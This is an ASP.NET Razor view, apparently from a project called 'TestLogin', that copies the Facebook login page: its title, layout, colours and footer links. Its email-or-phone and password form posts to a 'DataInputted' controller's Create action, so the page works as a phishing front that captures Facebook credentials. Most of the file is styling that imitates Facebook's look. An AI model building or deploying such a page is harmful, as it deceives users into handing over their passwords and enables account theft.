﻿@model TestLogin.Models.DataInputted
@{
    ViewData["Title"] = "Log into Facebook | Facebook";
}
<title>Log into Facebook | Facebook</title>
<div class="navbars">

    <img id="headimg" src="~/images/edited.png" />
    <hr class="line1" />
    <button type="button" id="buttonSign">Sign Up</button>
    <p id="text1">Connect and share with the people in your life.</p>

</div>

<br />
<br />

<div class="container">
    <h3>Facebook Login</h3>
    <hr />
    <form asp-controller="DataInputted" asp-action="Create">
        <label>Email or Phone:  </label>
        <input asp-for="Username" id="tbox2" type="text" /><br />
        <div class="adjust">
            <label>Password:  </label>
            <input asp-for="Password" class="tbox" type="password" /><br />
        </div>
        <input id="checkb" type="checkbox" />
        <div class="adjust2">
            <label id="lab3">Keep me logged in</label>
        </div>
        <br />
        <button id="but2" type="submit">Log In</button>
        <p id="ora"> or <a class="anch">Sign up for Facebook</a></p> <br />
        <a id="lasta">Forgot your password?</a>
    </form>
</div>
<ul>
    <li>English (US)</li>
    <li>Español</li>
    <li>Portugués (Brasil)</li>
    <li>Français (France)</li>
    <li>Deutsch</li>
    <li>Italiano</li>
</ul>
<br />
<hr id="line2" />
<table id="list2">
    <tr>
        <td>Mobile</td>
        <td>Find Friends</td>
        <td>Badges</td>
        <td id="other">People</td>
        <td>Pages</td>
        <td>Places</td>
        <td>Apps</td>
        <td>Games</td>
        <td>Music</td>
    </tr>
    <tr>
        <td>About</td>
        <td>Create an Ad</td>
        <td>Create a Page</td>
        <td>Developers</td>
        <td>Careers</td>
        <td>Privacy</td>
        <td>Cookies</td>
        <td>Terms</td>
        <td>Help</td>
    </tr>
</table>








<style>
    #other {
        margin-left: 20px;
    }

    #list2 {
        margin-left: 100px;
    }

    ul {
        margin-left: 266px;
    }

    td, li {
        padding-left: 15px;
        float: left;
        font-size: 12px;
        font-family: Helvetica;
        color: rgb(59, 89, 152);
        text-decoration: none;
        overflow: hidden;
    }

    #lasta {
        font-family: Helvetica;
        font-size: 12px;
        margin-left: 242px;
        text-decoration-line: none;
        text-decoration-color: none;
        text-decoration-style: none;
        color: rgb(59, 89, 152);
    }

    #but2 {
        border-top: 0.5px solid rgb(138, 156, 194);
        border-left: 0.5px solid rgb(41, 68, 126);
        border-right: 0.5px solid rgb(41, 68, 126);
        border-bottom: 0.5px solid rgb(41, 68, 126);
        color: white;
        padding: 3px 7px;
        margin-left: 242px;
        background-color: rgb(98, 122, 172);
        font-family: Helvetica;
        font-weight: 700;
    }

    #ora {
        font-family: Helvetica;
        font-size: 12px;
        font-weight: 600;
    }

    #ora {
        margin-left: 303px;
        margin-top: -19.7px;
    }

    a.anch {
        text-decoration: none;
        text-decoration-line: none;
        text-decoration-color: none;
        font-family: Helvetica;
        font-size: 12px;
        font-weight: 700;
        color: rgb(59, 89, 152);
    }

    .adjust2 {
        margin-top: -21px;
        margin-left: 118px;
    }

    .adjust {
        margin-top: 10px;
    }

    .container {
        border: 1px solid rgba(204, 204, 204,0.8);
        border-radius: 5px;
        margin-left: 320px;
        margin-right: 320px;
        padding: 10px 10px 10px 10px;
    }

    .navbars {
        border: 5px solid rgba(59, 89, 152,1);
        background-color: rgba(59, 89, 152,1);
        height: 145px;
        margin-left: -10px;
        margin-right: -10px;
        margin-top: -10px;
    }

    .line1 {
        margin-top: 18px;
        margin-left: 155px;
        margin-right: 150px;
        border: 0.5px solid rgb(102, 132, 184);
    }

    #line2 {
        margin-top: 18px;
        margin-left: 155px;
        margin-right: 150px;
        border: 0.5px solid rgb(204, 204, 204);
    }

    #headimg {
        margin-left: 150px;
        margin-top: 16px;
        height: 50px;
        width: 210px;
    }

    #buttonSign {
        color: white;
        display: inline-block;
        background-color: rgb(117, 173, 91);
        border-top: 0.5px solid rgb(152, 194, 134);
        border-left: 0.5px solid rgb(59, 110, 34);
        border-right: 0.5px solid rgb(59, 110, 34);
        border-bottom: 0.5px solid rgb(59, 110, 34);
        margin-top: 5px;
        margin-left: 155px;
        padding: 4px 7px;
        padding-bottom: 4px;
        font-size: 14px;
        font-family: Helvetica;
        text-align: center;
        font-weight: 600;
    }

    #text1 {
        font-size: 16px;
        color: white;
        margin-top: -19.7px;
        margin-left: 240px;
        font-family: Arial;
        font-weight: 600;
    }

    label {
        margin-left: 145px;
        font-family: Helvetica;
        color: rgb(102, 102, 102);
        font-size: 11px;
        font-weight: 700;
    }

    .tbox {
        margin-left: 36px;
    }

    #tbox2 {
        margin-left: 8px;
    }

    h3 {
        font-family: Helvetica;
        font-weight: 600;
    }

    #checkb {
        margin-top: 10px;
        margin-left: 239px;
    }
</style>




